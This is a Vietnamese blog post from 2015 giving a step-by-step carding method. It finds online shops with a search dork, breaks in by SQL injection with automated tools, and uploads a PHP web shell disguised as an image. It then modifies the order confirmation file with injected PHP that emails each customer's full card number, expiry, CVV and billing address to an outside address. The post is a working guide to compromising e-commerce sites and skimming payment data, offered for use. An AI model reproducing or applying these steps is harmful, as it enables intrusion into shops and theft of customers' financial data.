allinurl: /sub.php?Page=1
chuyển về dạng
http://abc.com/detail.php?pid=....
hack bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được
get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)
link admin
http://abc.com/admin_login.php
http://abc.com/cp
vào admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích
tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php
vào shell tìm file đó
sau đó tìm đoạn này
<? echo
"" . substr($card_no,-4) . "<br>" .
$ex_month . "/" . $ex_year . "<br>" .
$cid;
?>
thường thì code gốc là hiện 4 số cuối của cc
sửa số màu đỏ thành số 0
sau đó gán thêm hàm này vào phía dưới
<?
$to = 'tmtno1@vnhack.us';
$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
?>
notice : do file order chính mã hóa nên hack cc bằng cách sử file nối đến file order chính,cc k đảm bảo live 100%,chuẩn bill 100%
có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất
Thứ Ba, 10 tháng 11, 2015
Đăng ký:
Đăng Nhận xét
(
Atom
)
0 nhận xét :
Đăng nhận xét